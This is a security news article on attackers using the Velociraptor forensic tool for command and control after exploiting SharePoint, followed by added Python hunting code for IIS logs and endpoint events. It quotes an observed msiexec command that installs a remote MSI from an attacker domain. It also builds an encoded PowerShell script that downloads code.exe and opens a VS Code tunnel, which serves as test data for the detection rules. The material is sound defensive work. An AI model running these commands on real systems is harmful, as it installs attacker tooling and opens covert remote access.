Hackers Leverage Velociraptor DFIR Tool for Stealthy C2 & Ransomware Delivery

Legitimate administrative tools are increasingly becoming the weapon of choice for sophisticated threat actors aiming to blend in with normal network activity.

A recent campaign has highlighted this dangerous trend, where attackers are weaponizing Velociraptor, a widely respected Digital Forensics and Incident Response (DFIR) tool.

By deploying this software, adversaries effectively establish stealthy Command and Control (C2) channels, allowing them to execute arbitrary commands and maintain persistent access to compromised environments without triggering traditional security alarms.

The attacks, observed throughout late 2025, leverage critical vulnerabilities in widely used enterprise infrastructure, specifically targeting Windows Server Update Services (WSUS) and Microsoft SharePoint.

Once inside, the actors deploy Velociraptor to facilitate lateral movement and, in confirmed cases, deliver the Warlock ransomware.

This dual-use strategy complicates detection, as the presence of forensic tools often signals remediation rather than active compromise.

Huntress security analysts identified this evolving tradecraft after investigating three distinct incidents between September and November 2025.

Their research linked specific indicators, such as the hostname DESKTOP-C1N9M, to the financially motivated threat cluster Storm-2603.

The attackers demonstrated a high level of operational security, utilizing Cloudflare tunnels and digitally signed binaries to bypass endpoint defenses and evade network blocklists.

Exploiting SharePoint for Stealthy Access

The infection chain prominently features the exploitation of the “ToolShell” vulnerability chain in Microsoft SharePoint.

Attackers first bypass authentication using CVE-2025-49706 by sending specially crafted HTTP POST requests to /_layouts/15/ToolPane.aspx. Following this, they chain a secondary remote code execution vulnerability (CVE-2025-49704) to modify default files like start.aspx into malicious web shells.

IIS Access Logs for SharePoint Server (Source – Huntress)

The IIS access logs above show the unauthorized requests to the /_layouts/15/ directory that mark this exploitation.
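As an added example (not Huntress's code or the article's), the following Python parses IIS W3C access log lines and flags the pattern described above: an unauthenticated POST to /_layouts/15/ToolPane.aspx, followed by further requests under /_layouts/15/ from the same client address. The field order comes from the log's own #Fields header; the log lines, addresses and hostnames below are constructed for the example.

```python
"""Flag ToolShell-style activity in IIS W3C access logs.

Added example; the log excerpt is constructed, not Huntress data.
"""

# Constructed IIS W3C excerpt. Column order is taken from the #Fields line,
# as IIS writes it, so the parser does not hard-code positions.
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status
2025-10-14 02:10:00 10.0.0.5 GET /_layouts/15/start.aspx - 443 - 203.0.113.9 Mozilla/5.0 - 401
2025-10-14 02:11:08 10.0.0.5 GET /_layouts/15/start.aspx - 443 CORP\jsmith 10.0.0.77 Mozilla/5.0 https://sp.example.local/ 200
2025-10-14 02:13:41 10.0.0.5 POST /_layouts/15/ToolPane.aspx - 443 - 203.0.113.9 Mozilla/5.0 - 200
2025-10-14 02:13:42 10.0.0.5 GET /_layouts/15/start.aspx - 443 - 203.0.113.9 Mozilla/5.0 - 200
2025-10-14 02:20:00 10.0.0.5 GET /_layouts/15/ToolPane.aspx - 443 CORP\admin 10.0.0.78 Mozilla/5.0 https://sp.example.local/ 200
"""

TOOLPANE = "/_layouts/15/toolpane.aspx"


def parse_iis_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if fields is None or len(parts) != len(fields):
            continue  # cannot map this line to the header; skip it
        yield dict(zip(fields, parts))


def is_toolpane_auth_bypass(rec):
    """An anonymous POST to ToolPane.aspx is the exploitation request described in the article."""
    return (rec["cs-method"].upper() == "POST"
            and rec["cs-uri-stem"].lower() == TOOLPANE
            and rec["cs-username"] == "-")


def find_toolshell_activity(log_text):
    """Return (exploit_requests, followup_requests).

    followup_requests are later requests under /_layouts/15/ from a client
    that already sent an exploitation POST, e.g. use of a modified start.aspx.
    """
    records = sorted(parse_iis_w3c(log_text), key=lambda r: (r["date"], r["time"]))
    exploit = [r for r in records if is_toolpane_auth_bypass(r)]
    first_hit = {}
    for r in exploit:
        first_hit.setdefault(r["c-ip"], (r["date"], r["time"]))
    followup = [r for r in records
                if r["c-ip"] in first_hit
                and not is_toolpane_auth_bypass(r)
                and (r["date"], r["time"]) >= first_hit[r["c-ip"]]
                and r["cs-uri-stem"].lower().startswith("/_layouts/15/")]
    return exploit, followup


if __name__ == "__main__":
    hits, later = find_toolshell_activity(SAMPLE_LOG)
    for r in hits:
        print("EXPLOIT  ", r["date"], r["time"], r["c-ip"], r["cs-method"], r["cs-uri-stem"])
    for r in later:
        print("FOLLOW-UP", r["date"], r["time"], r["c-ip"], r["cs-method"], r["cs-uri-stem"])
```

The authenticated GET to ToolPane.aspx by CORP\admin is deliberately left unflagged, and the 401 from the attacker's address before the exploit POST is not counted as follow-up, so the rule keys on the unauthenticated POST rather than on the path alone.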

Once the web shell is active, the threat actors execute commands to download and install Velociraptor via Windows Installer. A typical command observed in these attacks is:

msiexec /q /i https://royal-boat-bf05.qgtxtebl.workers.dev/v3.msi

This installation registers Velociraptor as a Windows service, ensuring persistence across reboots. The Autoruns output below shows the resulting service entry.

Autorun created for Velociraptor to run as a Windows service (Source – Huntress)

To further entrench their position, the attackers use their own Velociraptor deployment to run Base64-encoded PowerShell commands on the host.

These scripts download Visual Studio Code (code.exe) to create outbound tunnels, effectively masking their malicious traffic within legitimate development activity.

VS Code logs for tunnel creation (Source – Huntress)

The VS Code logs show the events generated during tunnel creation, the point at which the actors move from abusing a forensic tool to holding a persistent, outbound-only foothold from which the rest of the network can be reached.
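The post-exploitation steps above (msiexec pulling an MSI from a URL, Velociraptor registered as a service, Base64-encoded PowerShell, and a VS Code tunnel) each leave a distinct mark in process and service telemetry. As an added example, not Huntress's code or the article's, the following Python runs simple hunt rules over a few constructed events of the kind Sysmon or Windows 4688/7045 logging would produce. The event records, PIDs, parent processes and the Velociraptor service image path are assumed for the example; the only command line taken from the article is the msiexec one.

```python
"""Hunt endpoint telemetry for the tradecraft described in the article.

Added example; EVENTS is constructed, not Huntress data.
"""
import base64
import re
from urllib.parse import urlparse


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Decode the -e/-ec/-enc/-EncodedCommand payload (Base64 of UTF-16LE), or None."""
    m = re.search(r"(?i)\s-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt(events):
    """Return (rule, identifier) findings for the events that match a rule."""
    findings = []
    for ev in events:
        if ev["type"] == "service":
            # Velociraptor installed as a service (assumed image path).
            if "velociraptor" in ev["image_path"].lower():
                findings.append(("velociraptor_service_installed", ev["name"]))
            continue
        image, parent, cmd = _basename(ev["image"]), _basename(ev["parent"]), ev["cmdline"]
        # The IIS worker process should not be launching installers or shells.
        if parent == "w3wp.exe" and image in {"cmd.exe", "powershell.exe", "msiexec.exe"}:
            findings.append(("iis_worker_spawned_shell", ev["pid"]))
        # msiexec installing a package straight from an http(s) URL.
        if image == "msiexec.exe" and any(
                urlparse(tok).scheme in ("http", "https") and urlparse(tok).netloc
                for tok in cmd.split()):
            findings.append(("msiexec_remote_package", ev["pid"]))
        # Encoded PowerShell whose decoded body fetches or starts a VS Code tunnel.
        if image == "powershell.exe":
            decoded = decode_encoded_command(cmd)
            if decoded and re.search(r"(?i)code\.exe|\btunnel\b", decoded):
                findings.append(("encoded_ps_vscode_tunnel", ev["pid"]))
        # code.exe started in tunnel mode.
        if image == "code.exe" and re.search(r"(?i)\btunnel\b", cmd):
            findings.append(("vscode_tunnel_started", ev["pid"]))
    return findings


# Constructed script standing in for the attackers' tunnel setup; the download
# URL is a placeholder. Encoded the way PowerShell expects for -EncodedCommand.
_TUNNEL_SCRIPT = ("Invoke-WebRequest -Uri https://example.invalid/code.exe "
                  "-OutFile C:\\Windows\\Temp\\code.exe; "
                  "& C:\\Windows\\Temp\\code.exe tunnel --accept-server-license-terms")
ENCODED = base64.b64encode(_TUNNEL_SCRIPT.encode("utf-16-le")).decode()

EVENTS = [
    {"type": "process", "pid": 4120, "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "cmdline": "msiexec /q /i https://royal-boat-bf05.qgtxtebl.workers.dev/v3.msi"},
    {"type": "service", "name": "Velociraptor",
     "image_path": r'"C:\Program Files\Velociraptor\Velociraptor.exe" service run'},
    {"type": "process", "pid": 5012,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Velociraptor\Velociraptor.exe",
     "cmdline": f"powershell.exe -NoProfile -EncodedCommand {ENCODED}"},
    {"type": "process", "pid": 5050, "image": r"C:\Windows\Temp\code.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "code.exe tunnel --accept-server-license-terms"},
    # Benign control: an administrator installing a local MSI from Explorer.
    {"type": "process", "pid": 6100, "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"msiexec /i C:\Users\admin\Downloads\7zip.msi /qn"},
]

if __name__ == "__main__":
    for rule, ident in hunt(EVENTS):
        print(f"{rule:32} {ident}")
```

The benign local msiexec run is included so the rule keys on the remote package URL and the IIS parent, not on msiexec itself; decoding the -EncodedCommand payload matters because the code.exe and tunnel strings are invisible in the raw command line.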
